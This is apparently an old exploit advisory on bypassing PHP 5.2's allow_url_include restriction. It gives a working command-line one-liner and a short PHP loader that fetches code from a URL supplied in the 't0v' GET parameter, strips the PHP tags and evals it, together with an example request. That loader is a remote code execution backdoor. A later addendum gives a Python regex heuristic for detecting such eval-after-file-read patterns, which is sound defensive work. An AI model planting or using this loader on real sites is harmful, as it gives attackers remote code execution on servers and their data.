PHP 5.2.* Bypass Remote File Inclusion

2009-01-07 / 2009-01-08
Credit: AL-MoGrM
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

--- 1. Example1 ---

bt ~ # curl http://xxx.com/images/Ex/r.txt
<?php
print "Welcome ... :)\n";
?>
bt ~ # php -r "include('http://xxx.com/images/Ex/r.txt');"
PHP Warning: include(): URL file-access is disabled in the server configuration in Command line code on line 1
PHP Warning: include(http://xxx.com/images/Ex/r.txt): failed to open stream: no suitable wrapper could be found in Command line code on line 1
PHP Warning: include(): Failed opening 'http://xxx.com/images/Ex/r.txt' for inclusion (include_path='.:/usr/lib/php') in Command line code on line 1
bt ~ # php -r '$file=implode("\n",file("http://xxx.com/images/Ex/r.txt"));$t0v=str_replace("<?php", "",$file);$t0v=str_replace("?>", "",$t0v);eval($t0v);'
Welcome ... :)
bt ~ #

--- 1. Example2 ---

<?php
/*
************************
* Include any File php *
* PHP (Bypass 5.2.*)   *
************************
* Coded By AL-MoGrM    *
* T0v@hotmail.Com      *
************************
*/
if($_GET[t0v]){
$file=implode("\n",file($_GET[t0v]));
$t0v=str_replace("<?php", "",$file);
$t0v=str_replace("<?", "",$t0v);
$t0v=str_replace("?>", "",$t0v);
eval($t0v);
}
?>

# http://site.com/file.php?t0v=http://xxx.com/images/Ex/r.txt

--- 2. Greets ---

("Mohajer22","abu nwaf")

--- 3. Contact ---

Author : AL-MoGrM
Email : t0v [at] hotmail [dot] com
www.tryag.com
www.tryag.cc
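Added example, not part of the original advisory: the examples above work because allow_url_include restricts only include/require, while file() still fetches URLs when allow_url_fopen is on. This Python heuristic flags PHP source in which eval() receives data read through file(), file_get_contents() or fopen(); the function names and the sample strings are constructed for illustration.

```python
import re

# PHP functions that read through stream wrappers. URL reads via these are
# governed by allow_url_fopen, not by allow_url_include.
READERS = re.compile(r"(?<![$\w>])(?:file|file_get_contents|fopen)\s*\(")
REQUEST = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")
URL = re.compile(r"""["'](?:https?|ftp)://""", re.I)
# Heuristic statement matcher (not a PHP parser): `$var = expr;` or `eval(expr);`
STMT = re.compile(r"\$(?P<var>\w+)\s*=(?![=>])(?P<rhs>[^;]*);"
                  r"|(?<![$\w>])eval\s*\((?P<arg>[^;]*)\)\s*;")

def origin_of(expr, tainted):
    """Classify where expr's data comes from; None if no stream read feeds it."""
    if READERS.search(expr):
        if REQUEST.search(expr):
            return "request-controlled"
        return "url-literal" if URL.search(expr) else "unknown-path"
    for name in re.findall(r"\$(\w+)", expr):
        if name in tainted:
            return tainted[name]
    return None

def find_eval_loaders(source):
    """Return (line, origin) for each eval() whose argument came from a stream read."""
    tainted, findings = {}, []
    for m in STMT.finditer(source):
        var = m.group("var")
        origin = origin_of(m.group("rhs") if var else m.group("arg"), tainted)
        if var is None:
            if origin:
                findings.append((source.count("\n", 0, m.start()) + 1, origin))
        elif origin:
            tainted[var] = origin       # assignment carries the read forward
        else:
            tainted.pop(var, None)      # variable overwritten with unrelated data
    return findings

# Constructed samples modelled on the two examples in the advisory.
ONE_LINER = r'''$file=implode("\n",file("http://xxx.com/images/Ex/r.txt"));$t0v=str_replace("<?php", "",$file);$t0v=str_replace("?>", "",$t0v);eval($t0v);'''
LOADER = r'''<?php
if($_GET[t0v]){
$file=implode("\n",file($_GET[t0v]));
$t0v=str_replace("<?php", "",$file);
eval($t0v); }'''
BENIGN = '<?php\n$x = file("http://xxx.com/images/Ex/r.txt");\n$x = "return 1";\neval($x);'

if __name__ == "__main__":
    for src in (ONE_LINER, LOADER, BENIGN):
        print(find_eval_loaders(src))
```

Regex matching will miss obfuscated or multi-file flows, so treat a hit as a lead for manual review rather than a verdict.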



Copyright 2020, cxsecurity.com